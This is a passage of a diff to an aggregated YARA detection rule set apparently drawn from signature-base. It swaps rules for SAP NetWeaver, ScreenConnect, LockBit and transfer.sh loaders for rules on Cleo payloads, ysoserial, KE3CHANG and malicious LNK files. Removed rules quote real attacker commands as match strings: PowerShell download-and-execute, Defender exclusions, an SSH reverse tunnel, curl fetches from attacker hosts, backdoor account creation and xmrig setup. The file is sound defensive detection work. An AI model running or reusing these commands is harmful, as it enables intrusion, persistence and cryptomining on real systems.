+		uint16( 0 ) == 0xfeca and filesize < 50KB and $a1 and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_1 : SCRIPT CVE_2025_31324 FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_2 : FILE
 {
 	meta:
-		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
+		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - file Proc"
 		author = "Florian Roth"
-		id = "78863492-5c83-55a8-900b-057e99125414"
-		date = "2025-04-25"
-		modified = "2025-05-15"
-		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sap_netweaver_apr25.yar#L2-L14"
+		id = "bd575454-7fd0-566d-94e5-ec1368675108"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L247-L265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab6c5e17bba15a3f968bdbe88a8cf4a039c55b6035d91fd3c6b30092be89af5c"
-		score = 70
+		logic_hash = "2bb5eace09b832bf3ce296484f473c9c56f97b881ea17838408be6000cc6fcb1"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2025-31324, FILE"
+		tags = "FILE"
+		hash1 = "1ba95af21bac45db43ebf02f87ecedde802c7de4d472f33e74ee0a5b5015a726"
 
 	strings:
-		$x01 = "/helper.jsp?cmd=" ascii wide
-		$x02 = "/cache.jsp?cmd=" ascii wide
+		$s1 = "Timeout getting pipe-data" ascii fullword
+		$s2 = "Ftprootpath" ascii fullword
+		$s3 = "Rest cmd=" ascii fullword
+		$s4 = "writeToProc" ascii fullword
 
 	condition:
-		filesize < 20MB and 1 of them
+		uint16( 0 ) == 0xfeca and filesize < 30KB and 3 of them
 }
-rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_2 : SCRIPT CVE_2025_31324 FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_3 : FILE
 {
 	meta:
-		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
-		author = "Florian Roth"
-		id = "17fb236e-e78c-51e5-b0a8-14964e38dfc5"
-		date = "2025-04-25"
-		modified = "2025-05-15"
-		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sap_netweaver_apr25.yar#L16-L27"
+		description = "Detects characteristics of JAR files used during Cleo software exploitation"
+		author = "X__Junior"
+		id = "5c227bb9-0731-5955-a758-6fe86ecc2d86"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L267-L286"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dfc24a4f359e2bc899ab3924bd342c2c6bd8c757b7c1d3859a47f61b9e4039a9"
-		score = 70
+		logic_hash = "64a6194110d4eb359cc3f15137cf752d598f2f0a52ac181fcaa358bf40072f54"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2025-31324, FILE"
+		tags = "FILE"
 
 	strings:
-		$x03 = "MSBuild.exe c:\\programdata\\" ascii wide
+		$a1 = "java/lang/String" ascii
+		$s1 = "#lsz#" ascii
+		$s2 = "#dbg#" ascii
+		$s3 = "#ll#" ascii
+		$s4 = "SvZipDataOverflow=%d OpNotConf=" ascii
 
 	condition:
-		filesize < 20MB and 1 of them
+		uint16( 0 ) == 0xfeca and filesize < 20KB and 3 of ( $s* ) and $a1
 }
-rule SIGNATURE_BASE_SUSP_WEBSHELL_Cmd_Indicator_Apr25
+rule SIGNATURE_BASE_Ysoserial_Payload_Mozillarhino1 : FILE
 {
 	meta:
-		description = "Detects a pattern which is often related to web shell activity"
-		author = "Florian Roth"
-		id = "735359b2-9f94-5618-8ec5-7ab8f5e5e16d"
-		date = "2025-04-25"
-		modified = "2025-05-07"
-		reference = "https://regex101.com/r/N6oZ2h/2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sap_netweaver_apr25.yar#L29-L41"
+		description = "Ysoserial Payloads - file MozillaRhino1.bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L10-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b992786a58389749db40fc90363f00c5df374d514374afc2d6fdff4429cb1ec0"
-		score = 60
-		quality = 60
-		tags = ""
+		logic_hash = "ca8cdd2781812ed373ca558b3a5a2fac5d236e16e6dbb8d66caa45081aef968b"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
 
 	strings:
-		$xr01 = /\.(asp|aspx|jsp|php)\?cmd=[a-z0-9%+\-\/\.]{3,20} HTTP\/1\.[01]["']? 200/
+		$s3 = "ysoserial.payloads" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0xedac and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Crywiper_Dec22
+rule SIGNATURE_BASE_Ysoserial_Payload_C3P0 : FILE
 {
 	meta:
-		description = "Detects CryWiper malware samples"
+		description = "Ysoserial Payloads - file C3P0.bin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d56ccf4e-30ba-5308-ad68-ffc2ae5a1718"
-		date = "2022-12-05"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
 		modified = "2023-12-05"
-		reference = "https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ru_crywiper.yar#L2-L19"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L25-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7c22e02ed996cd820ed87a0c5d50e3264629cdd887aad4ea466cadeccaee2b2f"
+		logic_hash = "53188caff69e1dbf655f4df7cda1406dd357af14a92ca4e686f514299b0adafc"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9932108d65e26d309bf7d97d389bc683e52e91eb68d0b1c8adfe318a4ec6e58b"
 
 	strings:
-		$x1 = "Software\\Sysinternals\\BrowserUpdate"
-		$sx1 = "taskkill.exe /f /im MSExchange*"
-		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Terminal Server" ascii
-		$s2 = "fDenyTSConnections" ascii
+		$x1 = "exploitppppw" fullword ascii
 
 	condition:
-		1 of ( $x* ) or all of ( $s* )
+		( uint16( 0 ) == 0xedac and filesize < 3KB and all of them )
 }
-rule SIGNATURE_BASE_Connectwise_Screenconnect_Authentication_Bypass_Feb_2024_Exploitation_IIS_Logs
+rule SIGNATURE_BASE_Ysoserial_Payload_Spring1
 {
 	meta:
-		description = "Detects an http request to '/SetupWizard.aspx/' with anything following it, which when found in IIS logs is a potential indicator of compromise of the 2024 ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
-		author = "Huntress DE&TH Team (modified by Florian Roth)"
-		id = "2886530b-e164-4c4b-b01e-950e3c40acb4"
-		date = "2024-02-20"
-		modified = "2024-02-21"
-		reference = "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L3-L18"
+		description = "Ysoserial Payloads - file Spring1.bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L40-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f6c7a3aa2ed98e754f9523c55eb035c7bc5f8aea96a6f86c729e9658d78710fb"
+		logic_hash = "852390d242c5cac243b54c31234c0ef3e25cede376eea23c73f03d79c548be8a"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
+		hash2 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
+		hash3 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
+		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
+		hash5 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
+		hash6 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
+		hash7 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
 
 	strings:
-		$s1 = " GET /SetupWizard.aspx/" ascii
-		$s2 = " POST /SetupWizard.aspx/" ascii
-		$s3 = " PUT /SetupWizard.aspx/" ascii
-		$s4 = " HEAD /SetupWizard.aspx/" ascii
+		$x1 = "ysoserial/Pwner" ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Unused_Feb24 : FILE
+rule SIGNATURE_BASE_Ysoserial_Payload : FILE
 {
 	meta:
-		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account wasn't actually used yet to login"
-		author = "Florian Roth"
-		id = "c57e6c6a-298f-5ff3-b76a-03127ff88699"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L20-L38"
+		description = "Ysoserial Payloads"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
+		date = "2017-02-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L61-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2433ad11ca1d9f970eb3c536a13f07e808c2a0b8b0dd625dffbe4947268ab8f5"
-		score = 65
+		logic_hash = "eec48af8bd3b377c8dd5af71027f67b36e1bd4d4ccfbd8134a26783517b5585a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
+		hash2 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
+		hash3 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
+		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
+		hash5 = "747ba6c6d88470e4d7c36107dfdff235f0ed492046c7ec8a8720d169f6d271f4"
+		hash6 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
+		hash7 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
+		hash8 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
+		hash9 = "1fea8b54bb92249203d68d5564a01599b42b46fc3a828fe0423616ee2a2f2d99"
+		hash10 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
+		hash11 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
+		hash12 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
+		hash13 = "f756c88763d48cb8d99e26b4773eb03814d0bd9bd467cc743ebb1479b2c4073e"
 
 	strings:
-		$a1 = "<Users xmlns:xsi="
-		$a2 = "<CreationDate>"
-		$s1 = "@poc.com</Email>"
-		$s2 = "<LastLoginDate>0001"
+		$x1 = "ysoserial/payloads/" ascii
+		$s1 = "StubTransletPayload" fullword ascii
+		$s2 = "Pwnrpw" fullword ascii
 
 	condition:
-		filesize < 200KB and all of ( $a* ) and all of ( $s* )
+		( uint16( 0 ) == 0xedac and filesize < 40KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Used_Feb24 : FILE
+rule SIGNATURE_BASE_Ysoserial_Payload_3 : FILE
 {
 	meta:
-		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account was already used yet to login"
-		author = "Florian Roth"
-		id = "91990558-f145-5968-9722-b6815f6ad8d5"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L40-L60"
+		description = "Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fb67f48-66dc-57a4-9075-49b2277fa186"
+		date = "2017-02-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/frohoff/ysoserial"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L92-L113"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "50967a07a9789f20ccbc882c3b9e3142f0c28068c0a58b9d8927d725d02bf289"
+		logic_hash = "49491d1c15af8c271fbbb7dedc678a91df74dcb093abe3f056b1ffc2fced99fe"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
+		hash2 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
 
 	strings:
-		$a1 = "<Users xmlns:xsi="
-		$a2 = "<CreationDate>"
-		$s1 = "@poc.com</Email>"
-		$f1 = "<LastLoginDate>0001"
+		$x1 = "ysoserialq" fullword ascii
+		$s1 = "targetClassInterceptorMetadatat" fullword ascii
+		$s2 = "targetInstancet" fullword ascii
+		$s3 = "targetClassL" fullword ascii
+		$s4 = "POST_ACTIVATEsr" fullword ascii
+		$s5 = "PRE_DESTROYsq" fullword ascii
 
 	condition:
-		filesize < 200KB and all of ( $a* ) and $s1 and not 1 of ( $f* )
+		( uint16( 0 ) == 0xedac and filesize < 10KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Screenconnect_Exploitation_Artefacts_Feb24 : SCRIPT
+
+rule SIGNATURE_BASE_SUSP_ENV_Folder_Root_File_Jan23_1 : SCRIPT FILE
 {
 	meta:
-		description = "Detects post exploitation indicators observed by HuntressLabs in relation to the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
-		author = "Florian Roth"
-		id = "079f4153-8bc7-574f-b6fa-af5536b842ab"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L62-L103"
+		description = "Detects suspicious file path pointing to the root of a folder easily accessible via environment variables"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6067d822-5c1b-5b86-863c-fdcfa37da665"
+		date = "2023-01-11"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_indicators.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f0d5f878847da1afb0d7b83e84bd337cfa67c36da2cbb33af712ed4ffad490a"
-		score = 75
-		quality = 83
-		tags = "SCRIPT"
+		logic_hash = "5355ae567e6255e22f566bae9fe50f4995bafba07c261461d37d5b8ba200d33a"
+		score = 70
+		quality = 58
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$x01 = "-c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}"
-		$x02 = ".msi c:\\mpyutd.msi"
-		$x03 = "/MyUserName_$env:UserName"
-		$x04 = " -OutFile C:\\Windows\\Help\\"
-		$x05 = "/Create /TN \\\\Microsoft\\\\Windows\\\\Wininet\\\\UserCache_"
-		$x06 = "$e = $r + \"ssh.exe\""
-		$x07 = "Start-Process -f $e -a $args -PassThru -WindowStyle Hidden).Id"
-		$x08 = "-R 9595:localhost:3389 -p 443 -N -oStrictHostKeyChecking=no "
-		$x09 = "chromeremotedesktophost.msi', $env:ProgramData+"
-		$x10 = "9595; iwr -UseBasicParsing "
-		$x11 = "curl  https://cmctt.]com/pub/media/wysiwyg/"
-		$x12 = ":8080/servicetest2.dll"
-		$x13 = "/msappdata.msi c:\\mpyutd.msi"
-		$x14 = "/svchost.exe -OutFile "
-		$x15 = "curl http://minish.wiki.gd"
-		$x16 = " -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile "
-		$x17 = "rundll32.exe' -Headers @"
-		$x18 = "/nssm.exe' -Headers @"
-		$x19 = "c:\\programdata\\update.dat UpdateSystem"
-		$x20 = "::size -eq 4){\\\"TVqQAA" ascii wide
-		$x21 = "::size -eq 4){\"TVqQAA" ascii wide
-		$x22 = "-nop -c [System.Reflection.Assembly]::Load(([WmiClass]'root\\cimv2:System_"
-		$xp0 = "/add default test@2021! /domain"
-		$xp1 = "/add default1 test@2021! /domain"
-		$xp2 = "oldadmin Pass8080!!"
-		$xp3 = "temp 123123qwE /add "
-		$xp4 = "oldadmin \"Pass8080!!\""
-		$xp5 = "nssm set xmrig AppDirectory "
+		$xr1 = /%([Aa]pp[Dd]ata|APPDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+		$xr2 = /%([Pp]ublic|PUBLIC)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+		$xr4 = /%([Pp]rogram[Dd]ata|PROGRAMDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
+		$fp1 = "perl -MCPAN " ascii
+		$fp2 = "CCleaner" ascii
 
 	condition:
-		1 of ( $x* )
+		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_SUSP_Command_Line_Combos_Feb24_2 : SCRIPT FILE
+rule SIGNATURE_BASE_APT_KE3CHANG_TMPFILE : APT KE3CHANG TMPFILE FILE
 {
 	meta:
-		description = "Detects suspicious command line combinations often found in post exploitation activities"
-		author = "Florian Roth"
-		id = "d9bc6083-c3ca-5639-a9df-483fea6d0187"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L105-L118"
+		description = "Detects Strings left in TMP Files created by K3CHANG Backdoor Ketrican"
+		author = "Markus Neis, Swisscom"
+		id = "84d411af-ea3d-5862-8c2f-7caca60c1b66"
+		date = "2020-06-18"
+		modified = "2023-12-05"
+		reference = "https://app.any.run/tasks/a96f4f9d-c27d-490b-b5d3-e3be0a1c93e9/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ke3chang.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0cd7b4771aa8fd622e873c5cdc6689d24394e5faf026b36d5f228ac09f4e0441"
+		logic_hash = "75c97fe2eeb82e09f52e98d76bd529824f171da4c802b5febc1036314d8145f0"
 		score = 75
 		quality = 85
-		tags = "SCRIPT, FILE"
+		tags = "APT, KE3CHANG, TMPFILE, FILE"
+		hash1 = "4ef11e84d5203c0c425d1a76d4bf579883d40577c2e781cdccc2cc4c8a8d346f"
 
 	strings:
-		$sa1 = " | iex"
-		$sa2 = "iwr -UseBasicParsing "
+		$pps1 = "PSParentPath             : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
+		$pps2 = "PSPath                   : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
+		$psp1 = ": Microsoft.PowerShell.Core\\Registry" ascii
+		$s4 = "PSChildName  : PhishingFilter" fullword ascii
+		$s1 = "DisableFirstRunCustomize : 2" fullword ascii
+		$s7 = "PSChildName  : 3" fullword ascii
+		$s8 = "2500         : 3" fullword ascii
 
 	condition:
-		filesize < 2MB and all of them
+		uint16( 0 ) == 0x5350 and filesize < 1KB and $psp1 and 1 of ( $pps* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_SUSP_PS1_Combo_Transfersh_Feb24 : SCRIPT
+rule SIGNATURE_BASE_APT_MAL_Ke3Chang_Ketrican_Jun20_1 : FILE
 {
 	meta:
-		description = "Detects suspicious PowerShell command that downloads content from transfer.sh as often found in loaders"
-		author = "Florian Roth"
-		id = "fd14cca5-9cf8-540b-9d6e-39ca2c267272"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L120-L135"
+		description = "Detects Ketrican malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ccd8322e-c822-512a-9ac5-eabc9d09640b"
+		date = "2020-06-18"
+		modified = "2023-12-05"
+		reference = "BfV Cyber-Brief Nr. 01/2020"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ke3chang.yar#L23-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64d4343ecdcbc4a28571557bec2f31c1ff73c2ecf63d0feaa0a71001bb9bf499"
-		score = 70
+		logic_hash = "a2806de18432dbab24f08c7c2863fd694c91192cf7df4388dfeb87b237f22257"
+		score = 75
 		quality = 85
-		tags = "SCRIPT"
+		tags = "FILE"
+		hash1 = "02ea0bc17875ab403c05b50205389065283c59e01de55e68cee4cf340ecea046"
+		hash2 = "f3efa600b2fa1c3c85f904a300fec56104d2caaabbb39a50a28f60e0fdb1df39"
 
 	strings:
-		$x1 = ".DownloadString('https://transfer.sh"
-		$x2 = ".DownloadString(\"https://transfer.sh"
-		$x3 = "Invoke-WebRequest -Uri 'https://transfer.sh"
-		$x4 = "Invoke-WebRequest -Uri \"https://transfer.sh"
+		$xc1 = { 00 59 89 85 D4 FB FF FF 8B 85 D4 FB FF FF 89 45
+               FC 68 E0 58 40 00 8F 45 FC E9 }
+		$op1 = { 6a 53 58 66 89 85 24 ff ff ff 6a 79 58 66 89 85 }
+		$op2 = { 8d 45 bc 50 53 53 6a 1c 8d 85 10 ff ff ff 50 ff }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lockbit_Ransomnote_Feb24
+rule SIGNATURE_BASE_LNK_Malicious_Nov1 : FILE
 {
 	meta:
-		description = "Detects the LockBit ransom note file 'LockBit-DECRYPT.txt' which is a sign of a LockBit ransomware infection"
-		author = "Florian Roth"
-		id = "b2fcb2a7-49e8-520c-944f-6acd5ded579b"
-		date = "2024-02-23"
-		modified = "2024-04-24"
-		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L137-L149"
+		description = "Detects a suspicious LNK file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1d08ac78-6ff0-5e3f-acc2-91bd63267d4c"
+		date = "2017-11-06"
+		modified = "2023-12-05"
+		reference = "https://www.virustotal.com/en/file/ee069edc46a18698fa99b6d2204895e6a516af1a306ea986a798b178f289ecd6/analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_link.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1fe07c33de1971b1f9430851dec4b8cd9f3ac7f087f0de18a2da4a390891b674"
+		logic_hash = "a1aa29497a0e4741807e3d74d54be69061aed21524c5f901615bd21e2ef13c67"
+		score = 60
+		quality = 81
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$c1 = "C:\\Windows\\System32\\cmd.exe" ascii wide
+		$s1 = "cmd.exe /" ascii wide nocase
+		$s2 = { 00 25 00 53 00 79 00 73 00 74 00 65 00 6D 00 52
+              00 6F 00 6F 00 74 00 25 00 5C 00 53 00 79 00 73
+              00 74 00 65 00 6D 00 33 00 32 00 EF 01 2F 00 43
+              00 20 00 22 00 63 00 6D 00 64 00 2E 00 65 00 78
+              00 65 }
+		$s3 = "%comspec%" ascii wide nocase fullword
+		$fp1 = "Microsoft Visual" ascii wide
+
+	condition:
+		( uint32( 0 ) == 0x0000004c and filesize < 4KB and $c1 and 1 of ( $s* ) ) and not 1 of ( $fp* )
+}
+rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Eraser_1 : FILE
+{
+	meta:
+		description = "Detects malware used in attack on academic data centers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "36d17887-9844-5fa4-8a0d-89cc41b2d876"
+		date = "2020-05-16"
+		modified = "2023-12-05"
+		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_academic_data_centers_camp_may20.yar#L1-L18"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "9a0410e86fa8fb8b599e5b8a6508d6889eb6e26600f0ecf222561ac4a169676d"
 		score = 75
 		quality = 85
-		tags = ""
